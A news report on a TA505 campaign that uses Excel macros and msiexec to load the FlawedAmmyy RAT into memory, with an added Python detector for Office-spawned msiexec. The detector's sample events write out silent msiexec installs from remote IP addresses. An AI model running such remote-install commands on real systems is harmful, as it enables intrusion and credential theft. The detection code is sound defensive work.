FlawedAmmyy RAT is transmitted through a malware campaign

As Microsoft warns, a newly discovered malicious campaign targets its victims' systems to load the notorious FlawedAmmyy RAT directly into memory.

FlawedAmmyy is a Remote Access Trojan (RAT) that gives attackers full access to their victims' machines and lets them move laterally across a network.

The Trojan can harvest sensitive information from a system, such as login files and credentials, capture screenshots, and even give the attacker access to the victim's webcam.

The threat actor associated with earlier campaigns that deployed this malware is TA505, best known for distributing the Dridex banking Trojan and the Locky ransomware.

According to Microsoft, the attack begins with malicious emails carrying .xls attachments with Korean-language content.

As soon as the user opens the file, a macro runs automatically and launches the legitimate msiexec.exe tool, which in turn downloads an MSI file.

Within this MSI file, attackers "hide an executable designed to decrypt and execute another executable file in memory as soon as it is opened."

"This executable file downloads and decrypts another file, wsus.exe, which is also digitally signed. Wsus.exe decrypts and runs the final payload directly in memory. The final payload is the FlawedAmmyy Trojan," Microsoft Security Intelligence explains in a tweet.
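A defender-side check for the first stage of the chain described above, an Office application spawning msiexec.exe to fetch a remote MSI package. This is an added example, not code from the article or from Microsoft; the log format, process names and sample events are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (not real telemetry), in a
# simple "parent image | child image | child command line" form.
SAMPLE_EVENTS = """\
explorer.exe | EXCEL.EXE | "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE" C:\\Users\\bob\\Downloads\\invoice.xls
EXCEL.EXE | msiexec.exe | msiexec.exe /q /i http://203.0.113.10/update.msi
svchost.exe | msiexec.exe | C:\\Windows\\System32\\msiexec.exe /V
explorer.exe | msiexec.exe | msiexec.exe /i C:\\Users\\bob\\Downloads\\7zip.msi
WINWORD.EXE | msiexec.exe | msiexec.exe /quiet /i https://198.51.100.7/stage.msi
"""

# Office processes that should normally never launch the Windows Installer.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


@dataclass
class Finding:
    rule: str       # which detection rule fired
    parent: str     # parent process image
    cmdline: str    # msiexec command line that triggered the rule
    remote: bool    # whether the package is fetched from a URL


def parse_event(line):
    """Split one constructed event line into (parent, image, cmdline)."""
    parent, image, cmdline = (part.strip() for part in line.split("|", 2))
    return parent, image, cmdline


def detect(events_text):
    """Return findings for msiexec.exe launches that match the campaign's
    first stage: an Office parent (high confidence), or any msiexec call
    that installs a package straight from a URL (lower confidence)."""
    findings = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        parent, image, cmdline = parse_event(line)
        if image.lower() != "msiexec.exe":
            continue
        remote = bool(URL_RE.search(cmdline))
        if parent.lower() in OFFICE_PARENTS:
            findings.append(Finding("office-spawned-msiexec", parent, cmdline, remote))
        elif remote:
            findings.append(Finding("msiexec-remote-package", parent, cmdline, remote))
    return findings
```

Running `detect(SAMPLE_EVENTS)` flags the two Office-launched msiexec events and ignores the service and local-package launches.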

Earlier this month, Trend Micro reported on TA505 campaigns targeting various Latin American and Asian countries with the FlawedAmmyy RAT and other RATs, revealing that the same infection mechanism has been in use for over two months.

In fact, the threat actor has been using backdoors such as FlawedAmmyy, Remote Manipulator (RMS), ServHelper and others for more than 6 months.
